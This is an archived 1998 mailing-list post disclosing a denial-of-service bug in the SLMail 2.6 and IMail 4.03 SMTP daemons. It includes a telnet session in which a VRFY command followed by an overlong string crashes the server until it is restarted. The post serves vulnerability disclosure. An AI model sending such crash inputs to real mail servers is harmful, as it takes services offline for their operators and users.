SLMail 2.6 DoS - Imail also

From: Jon (stevenat_private)
Date: Wed Mar 11 1998 - 18:22:52 PST


    I had written earlier:
    
    >
    > Hello,
    >
    >         I have recently found a quite serious DoS attack for the SLMail
    > 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
    > after a command makes the program crash.  I have only tested this on
    > 2.6, so I'm not sure if other versions are vulnerable.
    >
    > craphole:~$ telnet www.victim.com 25
    > Trying 555.55.555.55...
    > Connected to www.victim.com.
    > Escape character is '^]'.
    > 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
    > vrfy
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > Connection closed by foreign host.
    >
    > craphole:~$ telnet www.victim.com 25
    > Trying 555.55.555.55...
    > telnet: Unable to connect to remote host: Connection refused
    > craphole:~$
    >
    >         It will stay unresponsive until manually restarted. I haven't
    > mailed Seattle Labs about this, but I'm sure they'll figure it out.
    >
    > Later,
    >
    > Cisc0 @ Undernet
    > stevenat_private
    
    
    
    Out of boredom, I tried another smtp daemon for Windows, IMail (I tried
    4.03) by IPSwitch (www.ipswitch.com), which crashed the same way. Pretty
    strange, I've only tried two Windows NT smtp daemons, and both crashed
    the same way...
    
    Cisc0 @ Undernet
    stevenat_private
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:57 PDT